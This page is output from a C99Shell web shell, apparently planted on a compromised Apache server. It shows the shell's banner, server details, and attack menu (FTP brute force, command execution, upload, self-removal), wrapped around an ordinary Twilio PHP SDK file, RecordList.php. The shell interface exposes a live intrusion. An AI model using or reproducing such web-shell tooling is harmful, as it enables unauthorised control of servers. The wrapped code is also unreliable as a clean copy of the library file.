!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Api/V2010/Account/Usage/   drwxr-xr-x
Free 13.16 GB of 57.97 GB (22.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RecordList.php (9.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Api\V2010\Account\Usage;

use 
Twilio\Exceptions\TwilioException;
use 
Twilio\InstanceContext;
use 
Twilio\ListResource;
use 
Twilio\Options;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\AllTimeList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\DailyList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\LastMonthList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\MonthlyList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\ThisMonthList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\TodayList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\YearlyList;
use 
Twilio\Rest\Api\V2010\Account\Usage\Record\YesterdayList;
use 
Twilio\Serialize;
use 
Twilio\Stream;
use 
Twilio\Values;
use 
Twilio\Version;

/**
 * @property AllTimeList $allTime
 * @property DailyList $daily
 * @property LastMonthList $lastMonth
 * @property MonthlyList $monthly
 * @property ThisMonthList $thisMonth
 * @property TodayList $today
 * @property YearlyList $yearly
 * @property YesterdayList $yesterday
 */
class RecordList extends ListResource {
    protected 
$_allTime null;
    protected 
$_daily null;
    protected 
$_lastMonth null;
    protected 
$_monthly null;
    protected 
$_thisMonth null;
    protected 
$_today null;
    protected 
$_yearly null;
    protected 
$_yesterday null;

    
/**
     * Construct the RecordList
     *
     * @param Version $version Version that contains the resource
     * @param string $accountSid A 34 character string that uniquely identifies
     *                           this resource.
     */
    
public function __construct(Version $versionstring $accountSid) {
        
parent::__construct($version);

        
// Path Solution
        
$this->solution = ['accountSid' => $accountSid, ];

        
$this->uri '/Accounts/' \rawurlencode($accountSid) . '/Usage/Records.json';
    }

    
/**
     * Streams RecordInstance records from the API as a generator stream.
     * This operation lazily loads records as efficiently as possible until the
     * limit
     * is reached.
     * The results are returned as a generator, so this operation is memory
     * efficient.
     *
     * @param array|Options $options Optional Arguments
     * @param int $limit Upper limit for the number of records to return. stream()
     *                   guarantees to never return more than limit.  Default is no
     *                   limit
     * @param mixed $pageSize Number of records to fetch per request, when not set
     *                        will use the default value of 50 records.  If no
     *                        page_size is defined but a limit is defined, stream()
     *                        will attempt to read the limit with the most
     *                        efficient page size, i.e. min(limit, 1000)
     * @return Stream stream of results
     */
    
public function stream(array $options = [], int $limit null$pageSize null): Stream {
        
$limits $this->version->readLimits($limit$pageSize);

        
$page $this->page($options$limits['pageSize']);

        return 
$this->version->stream($page$limits['limit'], $limits['pageLimit']);
    }

    
/**
     * Reads RecordInstance records from the API as a list.
     * Unlike stream(), this operation is eager and will load `limit` records into
     * memory before returning.
     *
     * @param array|Options $options Optional Arguments
     * @param int $limit Upper limit for the number of records to return. read()
     *                   guarantees to never return more than limit.  Default is no
     *                   limit
     * @param mixed $pageSize Number of records to fetch per request, when not set
     *                        will use the default value of 50 records.  If no
     *                        page_size is defined but a limit is defined, read()
     *                        will attempt to read the limit with the most
     *                        efficient page size, i.e. min(limit, 1000)
     * @return RecordInstance[] Array of results
     */
    
public function read(array $options = [], int $limit null$pageSize null): array {
        return 
\iterator_to_array($this->stream($options$limit$pageSize), false);
    }

    
/**
     * Retrieve a single page of RecordInstance records from the API.
     * Request is executed immediately
     *
     * @param array|Options $options Optional Arguments
     * @param mixed $pageSize Number of records to return, defaults to 50
     * @param string $pageToken PageToken provided by the API
     * @param mixed $pageNumber Page Number, this value is simply for client state
     * @return RecordPage Page of RecordInstance
     */
    
public function page(array $options = [], $pageSize Values::NONEstring $pageToken Values::NONE$pageNumber Values::NONE): RecordPage {
        
$options = new Values($options);

        
$params Values::of([
            
'Category' => $options['category'],
            
'StartDate' => Serialize::iso8601Date($options['startDate']),
            
'EndDate' => Serialize::iso8601Date($options['endDate']),
            
'IncludeSubaccounts' => Serialize::booleanToString($options['includeSubaccounts']),
            
'PageToken' => $pageToken,
            
'Page' => $pageNumber,
            
'PageSize' => $pageSize,
        ]);

        
$response $this->version->page('GET'$this->uri$params);

        return new 
RecordPage($this->version$response$this->solution);
    }

    
/**
     * Retrieve a specific page of RecordInstance records from the API.
     * Request is executed immediately
     *
     * @param string $targetUrl API-generated URL for the requested results page
     * @return RecordPage Page of RecordInstance
     */
    
public function getPage(string $targetUrl): RecordPage {
        
$response $this->version->getDomain()->getClient()->request(
            
'GET',
            
$targetUrl
        
);

        return new 
RecordPage($this->version$response$this->solution);
    }

    
/**
     * Access the allTime
     */
    
protected function getAllTime(): AllTimeList {
        if (!
$this->_allTime) {
            
$this->_allTime = new AllTimeList($this->version$this->solution['accountSid']);
        }

        return 
$this->_allTime;
    }

    
/**
     * Access the daily
     */
    
protected function getDaily(): DailyList {
        if (!
$this->_daily) {
            
$this->_daily = new DailyList($this->version$this->solution['accountSid']);
        }

        return 
$this->_daily;
    }

    
/**
     * Access the lastMonth
     */
    
protected function getLastMonth(): LastMonthList {
        if (!
$this->_lastMonth) {
            
$this->_lastMonth = new LastMonthList($this->version$this->solution['accountSid']);
        }

        return 
$this->_lastMonth;
    }

    
/**
     * Access the monthly
     */
    
protected function getMonthly(): MonthlyList {
        if (!
$this->_monthly) {
            
$this->_monthly = new MonthlyList($this->version$this->solution['accountSid']);
        }

        return 
$this->_monthly;
    }

    
/**
     * Access the thisMonth
     */
    
protected function getThisMonth(): ThisMonthList {
        if (!
$this->_thisMonth) {
            
$this->_thisMonth = new ThisMonthList($this->version$this->solution['accountSid']);
        }

        return 
$this->_thisMonth;
    }

    
/**
     * Access the today
     */
    
protected function getToday(): TodayList {
        if (!
$this->_today) {
            
$this->_today = new TodayList($this->version$this->solution['accountSid']);
        }

        return 
$this->_today;
    }

    
/**
     * Access the yearly
     */
    
protected function getYearly(): YearlyList {
        if (!
$this->_yearly) {
            
$this->_yearly = new YearlyList($this->version$this->solution['accountSid']);
        }

        return 
$this->_yearly;
    }

    
/**
     * Access the yesterday
     */
    
protected function getYesterday(): YesterdayList {
        if (!
$this->_yesterday) {
            
$this->_yesterday = new YesterdayList($this->version$this->solution['accountSid']);
        }

        return 
$this->_yesterday;
    }

    
/**
     * Magic getter to lazy load subresources
     *
     * @param string $name Subresource to return
     * @return \Twilio\ListResource The requested subresource
     * @throws TwilioException For unknown subresources
     */
    
public function __get(string $name) {
        if (
\property_exists($this'_' $name)) {
            
$method 'get' \ucfirst($name);
            return 
$this->$method();
        }

        throw new 
TwilioException('Unknown subresource ' $name);
    }

    
/**
     * Magic caller to get resource contexts
     *
     * @param string $name Resource to return
     * @param array $arguments Context parameters
     * @return InstanceContext The requested resource context
     * @throws TwilioException For unknown resource
     */
    
public function __call(string $name, array $arguments): InstanceContext {
        
$property $this->$name;
        if (
\method_exists($property'getContext')) {
            return 
\call_user_func_array(array($property'getContext'), $arguments);
        }

        throw new 
TwilioException('Resource does not have a context');
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        return 
'[Twilio.Api.V2010.RecordList]';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0086 ]--